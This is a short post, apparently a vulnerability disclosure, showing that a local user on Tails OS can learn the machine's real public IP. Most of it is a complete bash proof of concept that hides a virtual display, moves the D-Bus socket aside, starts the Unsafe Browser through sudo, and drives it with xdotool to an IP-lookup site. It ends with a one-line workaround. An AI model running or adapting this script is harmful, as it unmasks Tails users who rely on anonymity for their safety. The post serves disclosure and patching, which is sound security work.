A compromised local user on Tails can get your pubic IP, no privilege escalation required: https://labs.riseup.net/code/issues/15635
#!/bin/bash
export DISPLAY=:69
mv /run/user/1000/bus{,.bak}
Xvfb $DISPLAY -r -nocursor & xpid=$!
sleep 1
sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &
xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return
xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return
xdotool search --sync --name Your getwindowname | awk '{print $5}'
mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0
Workaround: delete /etc/sudoers.d/zzz_unsafe-browser after start up